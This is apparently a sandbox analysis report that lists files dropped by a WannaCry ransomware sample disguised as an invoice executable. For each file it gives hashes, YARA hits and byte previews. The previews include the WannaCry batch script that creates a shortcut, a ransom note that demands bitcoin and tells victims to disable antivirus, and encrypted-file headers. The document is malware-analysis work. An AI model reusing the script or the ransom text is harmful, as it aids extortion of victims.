                                                          Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-01-16 10:00:00..fresh-until 2024-01-16 11:00:00..valid-until 2024-01-16 13:00:00..voting-delay 300 300..client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Rel

                                                          C:\Users\user\Desktop\00000000.pky

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:b.out overlay separate pure standalone executable Large Text Large Data Huge Objects Enabled
                                                          Category:dropped
                                                          Size (bytes):276
                                                          Entropy (8bit):7.067381929986639
                                                          Encrypted:false
                                                          SSDEEP:6:mtNr/SK7yjSSAfIO3vvhjzA5NS5B8Tg7dVfusOdYZTRHjYufxzNV9cyLz:YrSK7yjpAfIO3vv9sjp07fu9yTRHJxzl
                                                          MD5:5C44F9900D22F5A4747C58AD37CCF75A
                                                          SHA1:7E61B2C4EC9A8857A7999876AAA6AC771EAA84F5
                                                          SHA-256:3AE342251939D989640A8F75AD5FBF9C3086E36D17B1DCEE2CD0AF002B443DBD
                                                          SHA-512:1307FD40835F8D6880CF3AF3F0CAA2F3F80D3396F82DA96E78DC4D71BD4CABB127C7340A29565BD47F2D3170CD4CC4479AE0EC31846AA169D38A5721271C0B3C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:........RSA1........Y.$....8..7.<).w..S.l.u..b...x5.a...d.........l.....w..!.7...%..$....P.n./P.|......Q...~<I.7,.&....W.......a^........k.&*..f........I...._.....g..t.x...3.g.x.8.jn}...|......LXb......J+4..R..$..!.{L2.T.]B..f.T..........d..8.5.....EC%QZ.X.# .#..

                                                          C:\Users\user\Desktop\00000000.res

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):136
                                                          Entropy (8bit):1.5381653707365446
                                                          Encrypted:false
                                                          SSDEEP:3:r8thDA19ek+d/n:E9k+d/
                                                          MD5:94231ACB146EEEA45F734B8F5B322E58
                                                          SHA1:02781A444D76FBF8A538E292C528843E928639D8
                                                          SHA-256:F7EA13CCF5CCE5C013278A7D57025D362B3FBD5F1B6025D2809C894B45FEC679
                                                          SHA-512:D17E5781E94BD5C764F5B14762FA651217D862522993CCE2B282CDCA1E456C2F1D9D94B4BB21A19B3939312D81548BE85FDA26337EAC71484301905A08A2DE81
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.X..7.7..........................................................................................a.e.................e.q.e......^.....

                                                          C:\Users\user\Desktop\118491705402797.bat

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):316
                                                          Entropy (8bit):5.067197469242794
                                                          Encrypted:false
                                                          SSDEEP:3:mKDDfewSiponv6xewImKFcsDT6MWlynJ96wYexi+XCrbPT6MWlynJfF06xiHYwc0:hqn4+B9TGoJgpPGoJ0F9a2T2ZLT2Ln
                                                          MD5:70B5BF1FF46B32008E19BB544482FF97
                                                          SHA1:EDF0A524FB6682672B3AA8D98EE48F85212B8C2D
                                                          SHA-256:1A71C699D7C8744E9C648C2B2A2B4403E0A697DAC4FC5B5377ABD9BAE921C972
                                                          SHA-512:0200AAFB050FE9212060FAA05C849F5A6353090FEB6CD631AEBED1180F06863736A63C0B5E7CFD9E4070740997AC59E6491F6E0A4C9CAAE135C97ED4F4410BAC
                                                          Malicious:false
                                                          Yara Hits:
                                                          • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\118491705402797.bat, Author: Florian Roth
                                                          Reputation:unknown
                                                          Preview:@echo off...echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs...echo SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")>> m.vbs...echo om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe">> m.vbs...echo om.Save>> m.vbs...cscript.exe //nologo m.vbs...del m.vbs.....del /a %0..

                                                          C:\Users\user\Desktop\@Please_Read_Me@.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                          C:\Users\user\Desktop\@WanaDecryptor@.bmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                          Category:dropped
                                                          Size (bytes):1440054
                                                          Entropy (8bit):0.3363393123555661
                                                          Encrypted:false
                                                          SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                          MD5:C17170262312F3BE7027BC2CA825BF0C
                                                          SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                          SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                          SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\@WanaDecryptor@.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):245760
                                                          Entropy (8bit):6.278920408390635
                                                          Encrypted:false
                                                          SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                          MD5:7BF2B57F2A205768755C07F238FB32CC
                                                          SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                          SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                          SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: Joe Security
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: ReversingLabs
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: Joe Security
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: ReversingLabs
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: Joe Security
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: ReversingLabs
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          • Antivirus: Virustotal, Detection: 90%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cscript.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                          C:\Users\user\Desktop\AQRFEVRTGL.pdf

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.818964312449045
                                                          Encrypted:false
                                                          SSDEEP:24:E0K1eCqnPNivBFTim1KhKRtmSiykM0mlSkpTEjNTg/kkdf:lK8JFi7um1QKjBiykmlSkpTEtmf
                                                          MD5:693AC9ED94F92B2C19E1738ED459B007
                                                          SHA1:02B6C15A208B38D7181DE3417077886444E6B351
                                                          SHA-256:0F91E5493EF4D233510B4EB0A4301120B68BA60511C89DA8A462D2E491FDC096
                                                          SHA-512:9ADD0AAB299EA1C30E4B672697237F4773742CC766E55C72DCF6C50900F03CC42FCE0647CCC5929EF5506770DEEB6CFA427B83E8D50041C316A4ED532DD859FA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...:.@.........-.s3.{,.....j.....]b.AU&........=.-7.^...........U.A.~G.YD...^....].u...W_.#%...!....j.P2.hK!....B...h1-.....A..I...1.8.Q..gS.+.....F.e(p7..Ad...>..m]8u....KYd.lcf.W/.]S.n...6...$.y.7"..+.s.Ix.......v.|.v...^..K.{s.V{..=.V....U`...... L.J....&....P..*7.A..}......).g...U$.....c2).-R=2...E].f'&.q.OD ..\F.'l.S...5%.[.....5...l0=....r.Z.bz.l...#2..R.D.JK".}..................[...P".z.n+....@....a.lyF..h..FGw..!.....}..,.h...M"J.Y.iK]....Y=N....41.Po.d...@./\..0.5.T.+<......[.`...qaq...E[A.$.....lh...)..... ..4*.N..A.....g4.....YY.1..9X.o..o{....J..}J:.E.I"v.P..F`.M...Q.|.y..t.g2<......S..v..`.v!?..t.$.Z......8....].A.;.@.|Z.u..;.u.!..'.@"n....^...7.........n.Aj}M..?W.O.....^...~,.0.z..y....<.C...-H.>tX...*$;..R..a7A.?..Eh...;....?$..]|...pO...fGe6.....h..F.........X.TAa.x.M...V.|..Le ....5Ml#...Y......B>.r...4../...N.@.v...9H..D#V..e...D....[....6.A;v.J$..0q...c&....%.x.~wR.Ap...r..d.b....?}.x..J..EtV`.xh."E...1.".-..<L..ar

                                                          C:\Users\user\Desktop\AQRFEVRTGL.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.811585609914724
                                                          Encrypted:false
                                                          SSDEEP:24:bk6Gw/xcy4fqC22Hctw0kORD95lZBAEt3dcwo2px6qP4yYjvNWWJCkuavcNqg:bk6Ga412ecK0kQhL/PBXaY4yYjVSVavA
                                                          MD5:B8D3B838143EBCB53ABF999D6F49A316
                                                          SHA1:FC8C1C5DF72050BE909CE11BA8F6F8880273ED6E
                                                          SHA-256:7645B75AF9A44A2B29801593778818A9689753B58701C6E051FCB306ED3A7D48
                                                          SHA-512:24DC0F43AEBC4D0828596D197C740860F48AC9340EFA39CA6E174BFD1C5AAC19EAA8EDE333F1B3FE00520948480E72CFBB195C8762B02E87853F0C6615ED0C2B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......"D......7.O.X.1m.,p)..F.S.9^..c....?.....,.....a[.B.?0.h.....w.o.(P.....b.6..'..Z.$..DT.[ZT.q...Ta.....BJP..I...g.P.|W...-.?.%.....D.:L>c.....y.S.c.:..0\^....m.;E.._..q...8&...xx......n:' .../...(.......O`....[.....os.t.~.w.n...,9....5.~n............(.\.}p8b...S.X.l_ILe.......P...j..w.F..x.8..}.......2,...L...d,<..},.....#.:.6.sP-Z...2.j{B...!.....).:n...Z.$...cU.........N..C.......\\cI.Pb.dW.JY"e..\Zb.9O.%. M.*....dF.T...z.....6y..B...X.4... ~..JEo......ngp....=.9J.XP..q..%Vw=...Y...mbLlaS....`u..>.F&........0........0......v...9.......2..Ra;m..[....1...J.......>.?..*.w.D.}.....z.xXQ...S.....A..EI . .3.@.8..M..fl.1SMy.......Ao..Y..L@....)v....m0l+P(.U...:c...T.j.0.8...M.@..X=....u.q..@.h.....$.sK.O.|O.oPqp..:.....&..7..fw=t...G@c*w.6.V........0....p...*.f.}s._H).X.B..^.<.,S:7.&y.S.'."Z...ohO<.P.b:.*.oO.Z.....>.+.&..V....v.Kb6=..i.r3}{...~J.+O.F..r...S.q..f.=...<...C.0..m......"..5i..~^......*C....*S!.....m..P_.....m

                                                          C:\Users\user\Desktop\AQRFEVRTGL.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.811585609914724
                                                          Encrypted:false
                                                          SSDEEP:24:bk6Gw/xcy4fqC22Hctw0kORD95lZBAEt3dcwo2px6qP4yYjvNWWJCkuavcNqg:bk6Ga412ecK0kQhL/PBXaY4yYjVSVavA
                                                          MD5:B8D3B838143EBCB53ABF999D6F49A316
                                                          SHA1:FC8C1C5DF72050BE909CE11BA8F6F8880273ED6E
                                                          SHA-256:7645B75AF9A44A2B29801593778818A9689753B58701C6E051FCB306ED3A7D48
                                                          SHA-512:24DC0F43AEBC4D0828596D197C740860F48AC9340EFA39CA6E174BFD1C5AAC19EAA8EDE333F1B3FE00520948480E72CFBB195C8762B02E87853F0C6615ED0C2B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......"D......7.O.X.1m.,p)..F.S.9^..c....?.....,.....a[.B.?0.h.....w.o.(P.....b.6..'..Z.$..DT.[ZT.q...Ta.....BJP..I...g.P.|W...-.?.%.....D.:L>c.....y.S.c.:..0\^....m.;E.._..q...8&...xx......n:' .../...(.......O`....[.....os.t.~.w.n...,9....5.~n............(.\.}p8b...S.X.l_ILe.......P...j..w.F..x.8..}.......2,...L...d,<..},.....#.:.6.sP-Z...2.j{B...!.....).:n...Z.$...cU.........N..C.......\\cI.Pb.dW.JY"e..\Zb.9O.%. M.*....dF.T...z.....6y..B...X.4... ~..JEo......ngp....=.9J.XP..q..%Vw=...Y...mbLlaS....`u..>.F&........0........0......v...9.......2..Ra;m..[....1...J.......>.?..*.w.D.}.....z.xXQ...S.....A..EI . .3.@.8..M..fl.1SMy.......Ao..Y..L@....)v....m0l+P(.U...:c...T.j.0.8...M.@..X=....u.q..@.h.....$.sK.O.|O.oPqp..:.....&..7..fw=t...G@c*w.6.V........0....p...*.f.}s._H).X.B..^.<.,S:7.&y.S.'."Z...ohO<.P.b:.*.oO.Z.....>.+.&..V....v.Kb6=..i.r3}{...~J.+O.F..r...S.q..f.=...<...C.0..m......"..5i..~^......*C....*S!.....m..P_.....m

                                                          C:\Users\user\Desktop\HMPPSXQPQV.docx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.781409953882536
                                                          Encrypted:false
                                                          SSDEEP:24:pT2h3DHzKBlJ9ahlg9HsYGNrOL03LkYr2bOljU4S5XKV:pEDoJ9Og9yAApqOjtL
                                                          MD5:5F1B4D658538AB62FC6B74552BC3FB94
                                                          SHA1:6744674F0145918AE65BDDCAADBA9A3BAB1ECD77
                                                          SHA-256:D829E74D741B08C7D2FC1BAE8FAF68B8818C255A84A823B839CC0806C6831BB4
                                                          SHA-512:4CD51F4E378ADEEEB3807C9C0C5662A97142899E9A7E29324BBAC369A0ED444C60D925B4BEB1F8353723CAC95D2127CE2151CB413BC33DC12C0057F73714C22E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:0c.J`~.d...\.'..v.....K@f..H...&.&.'..T....t..I...!.shN/y.J9Z..........IN..DYw........c...E.k..U....th%+...6.7...v...&6...D..a...A. .k.O=K\H.M....y\.+.b..C.i..@...1.Vt....G4.d.QH](2..L.U>..l.T.."cN?.,,.L..W".d.....................}f............E.Y......r.+.#Q8.......C....3.!.>........8B.H.>r...,..x[;Tm!_.7.,.1.....a...p...E.."...C.....e..@ut.$..b.Y.._.bB.....w.U...\Q?...._]........_.....ja_...X..\..Ar..i..I.[..6y......a.${").....8.OpN..^...b.5J/8.3....4...3.|},n5...zI.=>t..k.iZ.^eT.....b..G.....`Fo`..+{l.h.>..u..GT!.......3.=............F.j.-+....X9....M.c...........|<...1..Y.G......o.1..{..Z^..1...I....W6.9..df..4..KL.........X.B.xg)......s.....V.....1L.k....g....J.p.\..#QO,_.az3'[Q.\t.....s.....1.$.VB./.q=Wl-.2......+lF.B^S.B...y........S ...n1#+<\w.3>l..aY2.|.3ia...........3._.@8.R........X...Zp.v~.\..I..&....e.4.+.."C`..6........:..!.Px.Y..k.,...Zh..SC....T....m........a.a6....H....k..^{..`&_..z..L|.9e...F.qL..#...y....

                                                          C:\Users\user\Desktop\HMPPSXQPQV.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.819803825174579
                                                          Encrypted:false
                                                          SSDEEP:24:bkhWqoXfVzKLurwS7xikAo/aRQSRu4W51gtDHjPCOww6yZ2TQH0AAKcdMdxDhz:bkhEPVzzrwgSQ53gtDHjPIJyZSecKcd6
                                                          MD5:0BC12847787B3ECDD5B1246BEE70B0BF
                                                          SHA1:3CCA754F3947D39EFFBEBCD8A926204112704714
                                                          SHA-256:D44A7A1CE1A6CCEE703BF5C00659EC3D9DB68B5382613F312D7648038B0E87C8
                                                          SHA-512:0CCDE623A0617100CAA3E2B760A4845AB3CC67FF6349AF82F751799B0848F3CDBD05CAF2790101D62305F3A0B1081D57B528288161DBD7EC281D09EDFCB719D4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....&d...P..o..{au....\.'..&C.r......kh..Ou.H.b.....,..../v......K.....s....x.RrJA..t......B...;.t&1..Y..a..4.|.wP...:.S,..M..t.r.f.R"y...{...Ra..).s...9.........:..3..WB|...q.f4..^ .....(O./...v$uV1L.c...c..IA}.gFA[...3hW./p=.e..e.R.O.3t....}M............../"E/Yo.....:......,..-..~(..m.f/.O..?.<.`A..Z.uz..Z.....B....r..../..M(...6`...R...a..@...hp.V..3.<M..tt..:..R....W....9...).t.H..n..M0....4EQ`..i.....@..^.~..#b..XP(..h..&.p$....c..+.).z.kPx...../.2.x...U...E.Y...M.....uxz..S$.......-[)\......x._w.'2.g..g.3.=;Z.)..,...i..0I....$k S.j.'.Eq.h..K.!RB...[.......A0..[..I2@..O..7]0.\........|....hd.+.6..PG..b..<Kq.X..X.xr..fm....M4..g...r..'.....(..zO..xm>.r.`......%.-n...7.n.$iB....^..V.R._.!..S.......#........:.a..R..7.r...?..r|.$.......-T..!..!.4..j...M....Vf .n. jGw..1..c.Y.....l........M...._.x..p.....>...B...}B.@..7".D.*N.l...~...K............4.....j...;.J.P..@A....Pcv...:..&.14....d/....N2M%.,,.X...l...Qx..T......4>.....

                                                          C:\Users\user\Desktop\HMPPSXQPQV.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.819803825174579
                                                          Encrypted:false
                                                          SSDEEP:24:bkhWqoXfVzKLurwS7xikAo/aRQSRu4W51gtDHjPCOww6yZ2TQH0AAKcdMdxDhz:bkhEPVzzrwgSQ53gtDHjPIJyZSecKcd6
                                                          MD5:0BC12847787B3ECDD5B1246BEE70B0BF
                                                          SHA1:3CCA754F3947D39EFFBEBCD8A926204112704714
                                                          SHA-256:D44A7A1CE1A6CCEE703BF5C00659EC3D9DB68B5382613F312D7648038B0E87C8
                                                          SHA-512:0CCDE623A0617100CAA3E2B760A4845AB3CC67FF6349AF82F751799B0848F3CDBD05CAF2790101D62305F3A0B1081D57B528288161DBD7EC281D09EDFCB719D4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....&d...P..o..{au....\.'..&C.r......kh..Ou.H.b.....,..../v......K.....s....x.RrJA..t......B...;.t&1..Y..a..4.|.wP...:.S,..M..t.r.f.R"y...{...Ra..).s...9.........:..3..WB|...q.f4..^ .....(O./...v$uV1L.c...c..IA}.gFA[...3hW./p=.e..e.R.O.3t....}M............../"E/Yo.....:......,..-..~(..m.f/.O..?.<.`A..Z.uz..Z.....B....r..../..M(...6`...R...a..@...hp.V..3.<M..tt..:..R....W....9...).t.H..n..M0....4EQ`..i.....@..^.~..#b..XP(..h..&.p$....c..+.).z.kPx...../.2.x...U...E.Y...M.....uxz..S$.......-[)\......x._w.'2.g..g.3.=;Z.)..,...i..0I....$k S.j.'.Eq.h..K.!RB...[.......A0..[..I2@..O..7]0.\........|....hd.+.6..PG..b..<Kq.X..X.xr..fm....M4..g...r..'.....(..zO..xm>.r.`......%.-n...7.n.$iB....^..V.R._.!..S.......#........:.a..R..7.r...?..r|.$.......-T..!..!.4..j...M....Vf .n. jGw..1..c.Y.....l........M...._.x..p.....>...B...}B.@..7".D.*N.l...~...K............4.....j...;.J.P..@A....Pcv...:..&.14....d/....N2M%.,,.X...l...Qx..T......4>.....

                                                          C:\Users\user\Desktop\HMPPSXQPQV.xlsx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.791694000979164
                                                          Encrypted:false
                                                          SSDEEP:24:Gvo2sPGUIVL5vgre/826KYJx7pE4sCQD+XWR/X3cKn/wLmsN9+TY:GvoPGd5IS5YJDQaXa3cswX9SY
                                                          MD5:8C699AE84923B9CED1B0F4EA0E538450
                                                          SHA1:5012063E03E46C6C00EA33A74E2AF46FD65CF555
                                                          SHA-256:2E4AEA52093E5FEDFCB7A62D470E84E019E9F0AB5CA576717AFE95318CDDF5EC
                                                          SHA-512:267FF2ADA241A9DE075CD5FA4A092EDA4872ADA9059F765CC255A7AB17C44C9D98CAA8243CA37D616DBB0EE7B12330112B31C225ABF8B700B1A153D2CD938320
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...C.p.t...3^n-.^X.<..M...'.@.!..j..Z-....0.0...m~?..)..Fc..?.)N.M..u.U..m$.`.k.".I)...E...Lh...{.0.4...b%.e.)........qe.]...!g..)E....Q.N..>.y....2....x..f....Y.:..wr.G.`..:..N..5....b..H..f@.z.34..........(V.._.t.jW.....G..3u....X:..rg.....nn.^.,...b...c.;...P]...,B..I.W....../.X.......G5.b3.....Zt.@.....Z....~.......q...O...*.mY.....^......UO.h.4...<.~.)[...Ij*.....9."..^.4.\.].....I]..............B.$.FC......BG..K....q.,..4.-.....#.. l..)....5.9....B^..f..a...`/...k..0.~..9..o. #.....QW*..a..|....7@.".f.......I,$'.5>n.f.......O..5. fl.....0L...O...Sd7D.O.....=t.Smj5.N._..d.K....w"..Rm.....[n.Ab.[ka...[..FV..O........*.5.....M...[...i.t&.{...\g#..L.z.H;..J.l..x. u...~P.J.'.m.Y./.....w$l....cv%...A.l..o..^P..W\.F.cX...y{..i4..)5275(...6t....).W.O.\.:..@..c.n..F.."i6i...x.._. .L_r.ya...#.....W:.m....N...Z[......^.S..u.C.-..1..c....;.G...v4E.).*.....Z*Z.#.>.....\.@Tp.C[...2y\M.f.........QC`...+v...v..^......^CZ.........h<..{-y...K..3...Q..

                                                          C:\Users\user\Desktop\HMPPSXQPQV.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.85180929987057
                                                          Encrypted:false
                                                          SSDEEP:24:bkbkA+aj5OQndftQMXm1JTcrKacGbIw2zWE62Mf26dhf6SrdRFsd59Fy:bkjj5ZVtPqkKx1w9E6Lf9p6SX259Q
                                                          MD5:35C43C2F7BF042D9619F74F0577388E3
                                                          SHA1:2A93CB0E0C16995181BF446B22B18533A5400290
                                                          SHA-256:30C32DE0621904187610F86234ABA18BBA95E73DA6C52774AC70C7F98AC1C357
                                                          SHA-512:993DD47705A728EBB00F518C8A01290A01F714625488E883E245BDF97BC0A31203D423EB1BA47495FDEB40B16CC7703E344FEDB6E8961FF0847B8E235ECBD2DB
                                                          Malicious:false
                                                          Reputation:unknown
